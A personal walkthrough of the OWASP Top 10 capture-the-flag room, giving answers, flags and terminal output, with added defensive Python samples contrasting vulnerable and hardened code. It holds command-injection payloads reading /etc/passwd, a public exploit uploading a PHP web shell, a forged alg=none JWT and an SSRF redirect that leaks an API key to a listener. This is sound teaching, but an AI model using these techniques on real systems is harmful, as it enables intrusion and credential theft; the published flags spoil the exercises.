What is OWASP?
The Open Web Application Security Project, or OWASP, is an international non-profit organization dedicated to web application security. One of OWASP’s core principles is that all of their materials be freely available and easily accessible on their website, making it possible for anyone to improve their own web application security.
What is OWASP Top 10?
The OWASP Top 10 is a regularly updated report outlining security concerns for web application security, focusing on the 10 most critical risks.
- Broken Access Control
- Cryptographic Failures
- Injection
- Insecure Design
- Security Misconfiguration
- Vulnerable and Outdated Components
- Identification and Authentication Failures
- Software and Data Integrity Failures
- Security Logging & Monitoring Failures
- Server-Side Request Forgery (SSRF)
1. Broken Access Control
Websites usually have pages that are protected from regular visitors. For example, only the site’s admin user should be able to access a page to manage other users. If a website visitor can access protected pages they are not meant to see, then the access controls are broken.
Broken Access Control (IDOR Challenge)
IDOR, or Insecure Direct Object Reference, refers to an access control vulnerability where you can access resources you wouldn’t normally be able to see. This occurs when the programmer exposes a Direct Object Reference, which is just an identifier that refers to a specific object within the server. An object can be a file, a user, a bank account in a banking application, or anything else the application stores.
Deploy the machine, go to http://MACHINE_IP and log in with the username noot and the password test1234.
Look at other user's notes. What is the flag?
flag{fivefourthree}
http://10.10.255.211/note.php?note_id=0
Changing the note_id in the URL from 1 to 0 revealed the flag.
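The server-side ownership check that note.php?note_id=N is missing, as an added example (not the room's own code): NOTES, the user names and the function names are constructed for illustration.

```python
# Constructed sample store: a global note id -> owner and body.
NOTES = {
    0: {"owner": "admin", "body": "flag{fivefourthree}"},
    1: {"owner": "noot", "body": "noot's private note"},
}


def get_note_vulnerable(note_id: int, session_user: str):
    """IDOR: the client-supplied note_id is used directly and the
    authenticated user is never consulted."""
    return NOTES.get(note_id)


def get_note_hardened(note_id: int, session_user: str):
    """The reference is honoured only if the authenticated user owns the object.
    'Missing' and 'not yours' return the same value, so the endpoint does not
    confirm which ids exist."""
    note = NOTES.get(note_id)
    if note is None or note["owner"] != session_user:
        return None
    return note


def list_my_notes(session_user: str):
    """Alternative design: enumerate from the user rather than from a global
    id, so the URL never needs to carry a direct object reference at all."""
    return [nid for nid, note in NOTES.items() if note["owner"] == session_user]
```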
2. Cryptographic Failures
A cryptographic failure refers to any vulnerability arising from the misuse of cryptographic algorithms for protecting sensitive information. Web applications require cryptography to provide confidentiality for their users at many levels.
Cryptographic Failures (Challenge)
Have a look around the web app. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
What is the name of the mentioned directory?
/assets
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
webapp.db
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
6eea9b7ef19179a06954edd0f6c05ceb
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
webapp.db

┌──(kali㉿kali)-[~/Downloads]
└─$ file webapp.db
webapp.db: SQLite 3.x database, last written using SQLite version 3022000, file counter 255, database pages 7, 1st free page 5, free pages 1, cookie 0x6, schema 4, UTF-8, version-valid-for 255

┌──(kali㉿kali)-[~/Downloads]
└─$ sqlite3 webapp.db
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables
sessions users
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> SELECT * FROM users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
Crack the hash. What is the admin’s plaintext password?
qwertyuiop
Login as the admin. What is the flag?
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
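Why the stored hash was the real failure, as an added example (not the room's code): the admin hash is the unsalted MD5 from webapp.db above, WORDLIST is a constructed sample, and the replacement uses the stdlib's salted PBKDF2-HMAC-SHA256 (a memory-hard KDF such as Argon2 or scrypt is preferable where available).

```python
import hashlib
import hmac
import os

# Admin password hash quoted from the SELECT output above.
STORED_MD5 = "6eea9b7ef19179a06954edd0f6c05ceb"
# Constructed mini wordlist; real ones hold millions of entries.
WORDLIST = ["password", "123456", "letmein", "qwertyuiop", "admin"]


def md5_wordlist_lookup(stored_hex: str, candidates):
    """Unsalted, fast MD5: one hash per guess and no per-user salt, so a
    precomputed table or a short wordlist recovers the password at once."""
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == stored_hex:
            return word
    return None


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted, deliberately slow hash. The record is self-describing so the
    parameters can be raised later without breaking old entries."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison: no timing side channel on the hash bytes.
    return hmac.compare_digest(dk.hex(), dk_hex)
```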
3. Injection
Injection flaws occur because the application interprets user-controlled input as commands or parameters.
Some common examples:
- SQL Injection
- Command Injection
The main defence for preventing injection attacks is ensuring that user-controlled input is not interpreted as queries or commands.
- Allow list: checks input by comparing it to a list of safe inputs. If the input is marked as safe, then it is processed. Otherwise, it’s rejected.
- Stripping input: If the input contains dangerous characters, these are removed before processing.
Command Injection
Command Injection occurs when server-side code in a web app makes a call to a function that interacts with the server’s console directly. An Injection web vulnerability allows an attacker to take advantage of that call to execute operating system commands arbitrarily on the server.
What strange text file is in the website’s root directory?
drpepper.txt
How many non-root/non-service/non-daemon users are there?
0
In order to find users in Linux, we can use the following command: cat /etc/passwd.
However, there are many users in the output, and we are only interested in non-root/non-service/non-daemon users.
We need to remember that Linux-based systems have two types of users: system users and normal users. System users are entities created by the system to run non-interactive processes, that is, processes that run in the background and do not require human interaction. Normal users are human users created by root or another user with root privileges. Both system and normal users in Linux have a unique User ID (UID) to identify them.
- System users have UIDs in the range from 0 (root user) to 999.
- Normal users typically receive UIDs from 1000 onwards.
I researched further to understand the /etc/passwd file fields. The third field of each line (arrow #3 in the original screenshot) is the UID. From the output of our cat /etc/passwd command, I found only one user with a UID higher than 1000: nobody. However, I learned that the user 'nobody' is a reserved user created by the system. Therefore, the answer to the question is actually 0.
What user is this app running as?
apache
In order to find the current user, we can inject the following command substitution: $(whoami)
What is the user’s shell set as?
/sbin/nologin
The output of the $(cat /etc/passwd) injection we saw above shows user apache’s shell at the very bottom.
What version of Alpine Linux is running?
3.16.0
The hint of the question tells us that the version can be found in /etc/alpine-release.
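The two defences listed above (allow list and stripping) next to the bug they prevent, as an added example (not the room's code): it assumes a hypothetical endpoint that greets a user-supplied name through the shell; the function and constant names are mine.

```python
import re
import subprocess

# Allow list: only identifier-like text is accepted at all.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# Characters a stripping filter removes (must enumerate every shell metacharacter).
DANGEROUS = set(";|&$`()<>\n\\'\"")


def greet_vulnerable(name: str) -> str:
    """User input is pasted into a shell command line, so $(...) and ; are
    interpreted by /bin/sh. This is the bug behind the $(whoami) payload above."""
    cmd = f"echo Hello {name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def strip_dangerous(name: str) -> str:
    """'Stripping input': drop shell metacharacters. Weaker than an allow list,
    because any metacharacter missing from DANGEROUS slips through."""
    return "".join(ch for ch in name if ch not in DANGEROUS)


def greet_hardened(name: str) -> str:
    """'Allow list' plus no shell at all: the value is one argv element that
    echo prints verbatim, so nothing in it can be interpreted as a command."""
    if SAFE_NAME.fullmatch(name) is None:
        raise ValueError("name rejected by allow list")
    return subprocess.run(["echo", "Hello", name],
                          capture_output=True, text=True).stdout
```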
4. Insecure Design
Insecure design refers to vulnerabilities that are inherent to the application’s architecture. They are not vulnerabilities regarding bad implementations or configurations; rather, the idea behind the whole application (or part of it) is flawed from the start.
Navigate to http://10.10.118.28:85 and get into joseph’s account. This application also has a design flaw in its password reset mechanism. Can you figure out the weakness in the proposed design and how to abuse it?
Try to reset joseph’s password. Keep in mind the method used by the site to validate that you are indeed joseph.
What is the value of the flag in joseph’s account?
THM{Not_3ven_c4tz_c0uld_sav3_U!}
One of the security questions was very easy to guess, and there was no limit on password attempts, which is an insecure design.
5. Security Misconfiguration
Security Misconfigurations occur when security could have been appropriately configured but was not. Even if you download the latest up-to-date software, poor configurations could make your installation vulnerable.
Security misconfigurations include:
- Poorly configured permissions on cloud services, like S3 buckets.
- Having unnecessary features enabled, like services, pages, accounts or privileges.
- Default accounts with unchanged passwords.
- Error messages that are overly detailed and allow attackers to find out more about the system.
- Not using HTTP security headers.
Navigate to http://10.10.118.28:86/console to access the Werkzeug console.
Use the Werkzeug console to run the following Python code to execute the ls -l command on the server:
import os; print(os.popen("ls -l").read())
What is the database file name (the one with the .db extension) in the current directory?
todo.db
Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?
THM{Just_a_tiny_misconfiguration}
6. Vulnerable and Outdated Components
Occasionally, you may find that the company/entity you’re pen-testing is using a program with a well-known vulnerability. It requires very little work to exploit its vulnerability because the vulnerability is already well-known. If a company misses a single update for a program they use, it could be vulnerable to any number of attacks.
Navigate to http://10.10.118.28:84 where you’ll find a vulnerable application. All the information you need to exploit it can be found online.
What is the content of the /opt/flag.txt file?
THM{But_1ts_n0t_my_f4ult!}
At the very top, the website clearly specifies that the site is built with PHP, MYSQL (procedure functions), and Bootstrap.
I googled "procedure functions bootstrap exploit" and the first result directs to Exploit-DB, clearly indicating we may be onto something! I downloaded the exploit and ran it:
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
47887.py webapp.db

┌──(kali㉿kali)-[~/Downloads]
└─$ python 47887.py
usage: 47887.py [-h] url
47887.py: error: the following arguments are required: url

┌──(kali㉿kali)-[~/Downloads]
└─$ python 47887.py http://10.10.118.28:84
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.118.28:84/bootstrap/img/KJvupFii50.php
> Example command usage: http://10.10.118.28:84/bootstrap/img/KJvupFii50.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ cat /opt/flag.txt
THM{But_1ts_n0t_my_f4ult!}
7. Identification and Authentication Failures
Authentication and session management constitute core components of modern web applications. Authentication allows users to gain access to web applications by verifying their identities. The most common form of authentication is using a username and password. If a user enters correct credentials, the server provides the user’s browser with a session cookie. A session cookie is needed because web servers use HTTP(S) to communicate, which is stateless. Attaching session cookies means the server will know who is sending what data. The server can then keep track of users’ actions.
Some common flaws in authentication mechanisms:
- Brute force attacks
- Use of weak credentials
- Weak Session Cookies
Some mitigations for broken authentication mechanisms:
- Enforce a strong password policy
- Enforce an automatic lockout after a certain number of attempts
- Implement Multi-Factor Authentication
Many times, what happens is that developers forget to sanitize the input given by the user in the code of their application. We will focus on a vulnerability that happens because of a developer’s mistake but is very easy to exploit: re-registration.
Go to http://10.10.118.28:8088 and try to register with darren as your username. You’ll see that the user already exists, so try to register " darren" (whitespace at the start) instead, and you’ll see that you are now logged in and can see the content present only in darren’s account, which in our case is the flag that you need to retrieve.
What is the flag that you found in darren’s account?
fe86079416a21a3c99937fea8874b667
Now try to do the same trick and see if you can log in as arthur.
d9ac0f7db4fda460ac3edeb75d75e16e
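A model of the re-registration flaw and its fix, as an added example (not the room's code): it assumes the vulnerable app checks uniqueness on the raw username but later resolves the account by the trimmed name, which is how " darren" ends up seeing darren's content; the store, names and functions are constructed.

```python
import unicodedata


def canonical(username: str) -> str:
    """One canonical form used for BOTH the uniqueness check and every lookup:
    NFKC (folds look-alikes such as a no-break space), strip, casefold."""
    return unicodedata.normalize("NFKC", username).strip().casefold()


def register_vulnerable(db: dict, username: str, password: str) -> bool:
    # Raw comparison: " darren" != "darren", so the check passes.
    if username in db:
        return False
    db[username] = {"password": password}
    return True


def lookup_vulnerable(db: dict, username: str):
    # Assumed behaviour: later lookups trim the name, so the new " darren"
    # session resolves to the existing darren record.
    return db.get(username.strip())


def register_hardened(db: dict, username: str, password: str) -> bool:
    name = canonical(username)
    if not name or name in db:
        return False
    db[name] = {"password": password}
    return True


def lookup_hardened(db: dict, username: str):
    return db.get(canonical(username))
```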
8. Software and Data Integrity Failures
What is Integrity?
When talking about integrity, we refer to the capacity we have to ascertain that a piece of data remains unmodified.
Integrity is essential in cybersecurity as we care about maintaining important data free from unwanted or malicious modifications.
A hash is generally mentioned as a solution for ensuring data integrity.
What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js?
sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=
When a user logs into an application, they will be assigned some sort of session token that will need to be saved on the browser. This token will be repeated on each subsequent request to identify who we are. These session tokens can come in many forms but are usually assigned via cookies.
Cookies are key-value pairs that a web application stores on the user’s browser and that are automatically repeated on each request to the website that issued them. This can be a terrible idea security-wise because cookies are stored on the user’s browser, so if the user tampers with the cookie, they could potentially impersonate someone else. The application would then suffer from a data integrity failure.
One solution to this is to use an integrity mechanism to guarantee that the cookie hasn’t been altered by the user. One popular option is JSON Web Tokens (JWT).
JWTs are very simple tokens that allow you to store key-value pairs on a token that provides integrity as part of the token. The idea is that you can generate tokens that you can give your users with the certainty that they won’t be able to alter the key-value pairs and pass the integrity check.
A JWT is formed of 3 parts: Header, Payload and Signature.
A data integrity failure vulnerability was present on some libraries implementing JWTs a while ago. The vulnerable libraries allowed attackers to bypass the signature validation by changing the two following things in a JWT:
- Modify the header section of the token so that the alg header contains the value none.
- Remove the signature part.
Try logging into the application as guest. What is guest’s account password?
guest
If your login was successful, you should now have a JWT stored as a cookie in your browser. Press F12 to bring out the Developer Tools.
What is the name of the website’s cookie containing a JWT token?
jwt-session
Use the knowledge gained in this task to modify the JWT token so that the application thinks you are the user “admin”.
What is the flag presented to the admin user?
THM{Dont_take_cookies_from_strangers}
original token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzE5ODk1NzI0fQ.KY3A8a6eVrLrqFt606eVjfMLYLGTRtZAwthimwQO5Lo
We learned that the JWT token is formed of 3 parts.
- Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
- Payload: eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzE5ODk1NzI0fQ
- Signature: KY3A8a6eVrLrqFt606eVjfMLYLGTRtZAwthimwQO5Lo
Now we can use an online base64 encode/decode tool to modify the contents of the header and remove the signature:
- Decode the Header part of the token.
- Modify the alg value to none.
- Decode the Payload part of the token.
- Modify the value of username to admin.
- Remove the Signature and combine the modified parts.
The results:
- Header_modified: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
- Payload_modified: eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzE5ODk1NzI0fQ
- Combined_token_modified: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzE5ODk1NzI0fQ.
Notice that I still kept the dot at the end even though we removed the signature part of the token.
Replace the value of the cookie with our modified token and refresh the page.
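What the vulnerable verifier got wrong, as an added example (not the room's or any JWT library's code): a minimal HS256 check that trusts the header's alg accepts the modified token above, while one that pins the algorithm rejects it. SECRET is a constructed value (the room's real signing key is unknown) and the expiry check is omitted.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # placeholder, not the room's key

# Segments quoted from the walkthrough above.
HEADER_NONE = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0"
PAYLOAD_ADMIN = "eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzE5ODk1NzI0fQ"
FORGED = f"{HEADER_NONE}.{PAYLOAD_ADMIN}."   # trailing dot: empty signature


def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_segment(seg: str) -> dict:
    return json.loads(b64url_decode(seg))


def sign_hs256(header_b64: str, payload_b64: str, key: bytes = SECRET) -> str:
    mac = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256)
    return b64url_encode(mac.digest())


def verify_vulnerable(token: str, key: bytes = SECRET):
    """Lets the token choose its own algorithm: alg=none means 'nothing to check'."""
    h, p, s = token.split(".")
    alg = decode_segment(h).get("alg")
    if alg == "none":
        return decode_segment(p)
    if alg == "HS256" and hmac.compare_digest(s, sign_hs256(h, p, key)):
        return decode_segment(p)
    return None


def verify_hardened(token: str, key: bytes = SECRET):
    """The server decides the algorithm; the MAC is always checked."""
    h, p, s = token.split(".")
    if decode_segment(h).get("alg") != "HS256":
        return None
    if not hmac.compare_digest(s, sign_hs256(h, p, key)):
        return None
    return decode_segment(p)
```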
9. Security Logging and Monitoring Failures
When web applications are set up, every action performed by the user should be logged. Logging is important because if an incident occurs, the attackers’ activities can be traced. Once their actions are traced, their risk and impact can be determined.
The information stored in logs should include the following:
- HTTP status codes
- Time Stamps
- Usernames
- API endpoints/page locations
- IP addresses
These logs have sensitive information so it’s important to ensure that they are stored securely and that multiple copies of these logs are stored at different locations.
200 OK 12.55.22.88 jr22 2019-03-18T09:21:17 /login
200 OK 14.56.23.11 rand99 2019-03-18T10:19:22 /login
200 OK 17.33.10.38 afer11 2019-03-18T11:11:44 /login
200 OK 99.12.44.20 rad4 2019-03-18T11:55:51 /login
200 OK 67.34.22.10 bff1 2019-03-18T13:08:59 /login
200 OK 34.55.11.14 hax0r 2019-03-21T16:08:15 /login
401 Unauthorised 49.99.13.16 admin 2019-03-21T21:08:15 /login
401 Unauthorised 49.99.13.16 administrator 2019-03-21T21:08:20 /login
401 Unauthorised 49.99.13.16 anonymous 2019-03-21T21:08:25 /login
401 Unauthorised 49.99.13.16 root 2019-03-21T21:08:30 /login
What IP address is the attacker using?
49.99.13.16
What kind of attack is being carried out?
brute force
10. Server-Side Request Forgery (SSRF)
This type of vulnerability occurs when an attacker coerces a web application into sending requests on their behalf to arbitrary destinations while having control of the contents of the request itself. SSRF vulnerabilities often arise from implementations where our web application needs to use third-party services.
Navigate to http://MACHINE_IP, where you’ll find a simple web application. After exploring a bit, you should see an admin area, which will be our main objective. Follow the instructions in the following questions to gain access to the website’s restricted area!
Explore the website. What is the only host allowed to access the admin area?
localhost
Check the “Download Resume” button. Where does the server parameter point to?
secure-file-storage.com
Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?
THM{Hello_Im_just_an_API_key}
Replace the secure-file-storage.com part with your own AttackBox IP address and run the nc -lvp 8087 command:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 8087
listening on [any] 8087 ...
10.10.245.216: inverse host lookup failed: Unknown host
connect to [10.6.67.243] from (UNKNOWN) [10.10.245.216] 34718
GET /public-docs-k057230990384293/75482342.pdf HTTP/1.1
Host: 10.6.67.243:8087
User-Agent: PycURL/7.45.1 libcurl/7.83.1 OpenSSL/1.1.1q zlib/1.2.12 brotli/1.0.9 nghttp2/1.47.0
Accept: */*
X-API-KEY: THM{Hello_Im_just_an_API_key}
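The server-side validation the "Download Resume" handler was missing, as an added example (not the room's code): the server parameter is checked against an allow list of the one storage host the app was built to talk to, and the resolved address is rejected if it is internal, so neither the AttackBox nor localhost (the only host allowed into the admin area) can be reached. The resolver argument exists so the check can be exercised offline; the function names are mine.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# The only destination the app is designed to fetch resumes from.
ALLOWED_SERVERS = {"secure-file-storage.com"}


def is_public_ip(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast)


def build_download_url(server: str, path: str, resolver=socket.gethostbyname) -> str:
    """Validate the user-controlled `server` value before any outbound request
    (and before the X-API-KEY header is attached to it). Raises ValueError on
    anything but the allow-listed, publicly-routed storage host."""
    # Parse as an authority: strips port and defeats user@host tricks, e.g.
    # "secure-file-storage.com@10.6.67.243" has hostname 10.6.67.243.
    host = urlsplit(f"//{server}").hostname
    if host not in ALLOWED_SERVERS:
        raise ValueError(f"server {server!r} not in allow list")
    if not path.startswith("/") or ".." in path:
        raise ValueError("bad path")
    # Resolve and check the address too: a DNS answer pointing at 127.0.0.1
    # or 10.x would otherwise turn the allow-listed name into an internal hop.
    if not is_public_ip(resolver(host)):
        raise ValueError("host resolves to an internal address")
    return f"https://{host}{path}"
```

The address check is only as good as the moment it runs; a resolver that returns a different answer for the actual request (DNS rebinding) still needs the HTTP client to connect to the validated IP rather than re-resolve.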